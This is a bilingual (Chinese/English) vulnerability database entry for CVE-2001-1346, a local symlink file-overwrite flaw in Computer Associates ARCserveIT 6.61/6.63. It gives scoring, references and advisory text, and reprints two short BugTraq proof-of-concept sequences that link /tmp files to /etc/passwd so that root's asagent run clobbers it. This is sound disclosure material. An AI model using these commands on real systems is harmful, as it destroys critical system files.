CVE-2001-1346
CVSS1.2
发布时间 :2001-05-18 00:00:00
修订时间 :2008-09-10 15:10:20
NMCOES    

[原文]Computer Associates ARCserveIT 6.61 and 6.63 (also called ARCservIT) allows local users to overwrite arbitrary files via a symlink attack on the temporary files (1) asagent.tmp or (2) inetd.tmp.


[CNNVD]Computer Associates ARCserveIT覆盖任意文件漏洞(CNNVD-200105-088)

        Computer Associates ARCserveIT 6.61和6.63版本(也称为ARCservIT)存在漏洞。本地用户借助临时文件(1) asagent.tmp或者(2) inetd.tmp的符号链接攻击覆盖任意文件。

- CVSS (基础分值)

CVSS分值: 1.2 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: HIGH [漏洞利用存在特定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ca:arcserve_backup:6.63
cpe:/a:ca:arcserve_backup:6.61Computer Associates ARCServeIT 6.61

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1346
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1346
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-088
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2001-05/0184.html
(UNKNOWN)  BUGTRAQ  20010518 tmp-races in ARCservIT Unix Client
http://www.securityfocus.com/bid/2748
(UNKNOWN)  BID  2748
http://www.securityfocus.com/bid/2741
(UNKNOWN)  BID  2741

- 漏洞信息

Computer Associates ARCserveIT覆盖任意文件漏洞
低危 访问验证错误
2001-05-18 00:00:00 2005-10-20 00:00:00
本地  
        Computer Associates ARCserveIT 6.61和6.63版本(也称为ARCservIT)存在漏洞。本地用户借助临时文件(1) asagent.tmp或者(2) inetd.tmp的符号链接攻击覆盖任意文件。

- 公告与补丁

        Computer Associates has reportedly been made aware of this vulnerability.
        Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (20867)

ARCservIT 6.61/6.63 Client asagent.tmp Arbitrary File Overwrite Vulnerability (EDBID:20867)
linux local
2001-05-18 Verified
0 Jonas Eriksson
N/A [点击下载]
source: http://www.securityfocus.com/bid/2741/info

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to overwrite arbitrary files.

When it runs for the first time, 'asagent', opens (and truncates it if it exists) a file in /tmp called 'asagent.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.

This may allow malicious local users to overwrite critical system files. 

As user:

je@boxname~> ln -s /etc/passwd /tmp/asagent.tmp

And root:

root@boxname# /usr/CYEagent/asagent start
CA Universal Agent ADV v1.39 started on openview SunOS 5.8
Generic_108528-07 sun4u

ARCserveIT Universal Agent started...

Then,

je@boxname~> ls -la /etc/passwd
-r--r--r-- 1 0 sys 0 May 9 11:59 /etc/passwd 		

- 漏洞信息 (20868)

ARCservIT 6.61/6.63 Client inetd.tmp Arbitrary File Overwrite Vulnerability (EDBID:20868)
linux local
2001-05-18 Verified
0 Jonas Eriksson
N/A [点击下载]
source: http://www.securityfocus.com/bid/2748/info

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files.

When it runs with the parameters 'inet add', 'asagent', opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.

This may allow malicious local users to corrupt critical system files. 

je@boxname~> ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~> cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent 		

- 漏洞信息

6765
CA ARCserveIT asagent inetd.tmp Temporary File Symlink Arbitrary File Overwrite
Local Access Required Input Manipulation, Race Condition
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

- 时间线

2001-05-18 Unknow
2001-05-18 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

ARCservIT Client inetd.tmp Arbitrary File Overwrite Vulnerability
Access Validation Error 2748
No Yes
2001-05-18 12:00:00 2009-07-11 06:06:00
This vulnerabilty was discovered by Jonas Eriksson <je@sekure.net> and posted to BugTraq on May 18th, 2001.

- 受影响的程序版本

Computer Associates ARCServeIT 6.63
Computer Associates ARCServeIT 6.61

- 漏洞讨论

ARCservIT from Computer Associates contains a vulnerability which may allow malicious local users to corrupt arbitrary files.

When it runs with the parameters 'inet add', 'asagent', opens (and overwrites it if it exists) a file in /tmp called 'inetd.tmp'. 'asagent' does not check to make sure that this file already exists or that is a symbolic link to another file.

This may allow malicious local users to corrupt critical system files.

- 漏洞利用

This example was posted to BugTraq by Jonas Eriksson &lt;je@sekure.net&gt; by May 18th, 2001.

je@boxname~&gt; ln -s /etc/passwd /tmp/inetd.tmp

And root:

root@boxname# /usr/CYEagent/asagent inet add

Then,

je@boxname~&gt; cat /etc/passwd
asagentd 6051/tcp # ARCserve agent
asagentd 6051/udp # ARCserve agent

- 解决方案

Computer Associates has reportedly been made aware of this vulnerability.

Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站